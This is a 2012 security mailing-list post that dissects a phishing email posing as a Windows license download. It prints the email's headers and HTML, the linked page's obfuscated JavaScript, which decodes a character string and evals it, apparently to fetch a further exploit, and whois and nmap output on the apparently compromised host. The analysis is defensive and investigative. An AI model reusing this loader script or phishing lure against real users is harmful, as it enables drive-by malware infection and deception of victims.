[Plug-security] Analysis of a Phishing Email Exploit

Mon Oct 22 10:04:58 MST 2012

I received a phishing email spoofed from support at obnosis.com.  Let's
look into what it does?

Received-SPF: softfail (google.com: domain of transitioning
SpencerLevoy at ezweb.ne.jp does not designate 2.135.176.89 as permitted
sender) client-ip=2.135.176.89;
Authentication-Results: mx.google.com; spf=softfail (google.com:
domain of transitioning SpencerLevoy at ezweb.ne.jp does not designate
2.135.176.89 as permitted sender) smtp.mail=SpencerLevoy at ezweb.ne.jp
Received: from  by lsean.ezweb.ne.jp; Mon, 22 Oct 2012 10:41:00 +0300
Message-ID: <B4F29576.6070405 at lisakachold>
Date: Mon, 22 Oct 2012 10:41:00 +0300
From: <support at obnosis.com>
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; rv:1.9.2.2)
Gecko/20100316 Lightning/1.0b4 Thunderbird/2.0.0.23
MIME-Version: 1.0
To: lisakachold at obnosis.com
Subject: Re: Fwd: Order N 8080409
Content-Type: multipart/alternative;
 boundary="------------000400070406090103060003"

This is a multi-part message in MIME format.
--------------000400070406090103060003
Content-Type: text/plain; charset=Windows-1252; format=flowed
Content-Transfer-Encoding: 7bit

Hello,You can download your Microsoft Windows License  here -Microsoft
Corporation

--------------000400070406090103060003
Content-Type: text/html; charset=Windows-1252
Content-Transfer-Encoding: 7bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=Windows-1252">
</head>
<body bgcolor="#ffffff" text="#000000">
Hello,<br /><br />

You can download your Microsoft Windows License <a
href="http://private.detlef-kunz.de/page2.htm"> here </a>-<br /><br
/><br />

Microsoft Corporation<br /><br>
</body>
</html>

--------------000400070406090103060003--

*http://private.detlef-kunz.de/page2.htm*

Page2.htm:

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
 </head>
 <body>
<h1><b>Please wait a moment. You will be forwarded..</h1></b>
<h3>Internet Explorer or Mozilla Firefox compatible only </h3><br>

<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}
n="5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="";n=n.split("$@");if(m)for(i=0;i-109!=0;i++){k=i;if(window.document)s+=String["fro"+"mCharCode"](parseInt(n[i],20));}try{fsfewbfew--}catch(dgdsh){ev(s);}}</script>

 </body>
</html>

-end-

Anyone want to crack the utf-8 in this ampersand encoded malicious
javascript and tell us peice by peice what this does?

Reference: http://dev.networkerror.org/utf8/
Tool: http://macchiato.com/unicode/convert.html

Javascript Ampersand padding looks like:

"5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="

I am betting this is an Apple Quicktime embedded exploit:

http://www.youtube.com/watch?v=C6e-shdTvsk

http://private.detlef-kunz.de/ looks like a normal under construction page!
http://whois.domaintools.com/detlef-kunz.de
Immediate Action:  Report to private.detlef-kunz.de technical contacts.

[Tech-C]
Type: ROLE
Name: HostEurope GmbH
Address: Welserstrasse 14
PostalCode: 51149
City: Köln
CountryCode: DE
Phone: +49 800 4678387
Fax: +49 1805 663233
Email: <snip>
Changed: 2012-07-12T12:16:13+02:00

*
Non-authoritative answer:
Name:    private.detlef-kunz.de
Addresses:  2a01:488:42:1000:57e6:2f69:6d:740
          87.230.47.105*

Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-22 09:58 US Mountain
Standard Time

NSE: Loaded 93 scripts for scanning.

NSE: Script Pre-scanning.

Initiating Ping Scan at 09:58

Scanning 87.230.47.105 [4 ports]

Completed Ping Scan at 09:58, 1.11s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:58

Completed Parallel DNS resolution of 1 host. at 09:58, 0.36s elapsed

Initiating SYN Stealth Scan at 09:58

Scanning vwp3866.webpack.hosteurope.de (87.230.47.105) [1000 ports]

Discovered open port 21/tcp on 87.230.47.105

Discovered open port 143/tcp on 87.230.47.105

Discovered open port 110/tcp on 87.230.47.105

Discovered open port 587/tcp on 87.230.47.105

Discovered open port 993/tcp on 87.230.47.105

Discovered open port 3306/tcp on 87.230.47.105

Discovered open port 80/tcp on 87.230.47.105

Discovered open port 22/tcp on 87.230.47.105

Discovered open port 995/tcp on 87.230.47.105

Discovered open port 465/tcp on 87.230.47.105

Discovered open port 5666/tcp on 87.230.47.105

Completed SYN Stealth Scan at 09:58, 5.49s elapsed (1000 total ports)

Initiating Service scan at 09:58

Analysis indicates a high probability that this is a hacked server.

Anyone want to expand on this?

-- 
(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
it-clowns.com
Chief Clown
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20121022/d9cc1997/attachment.html>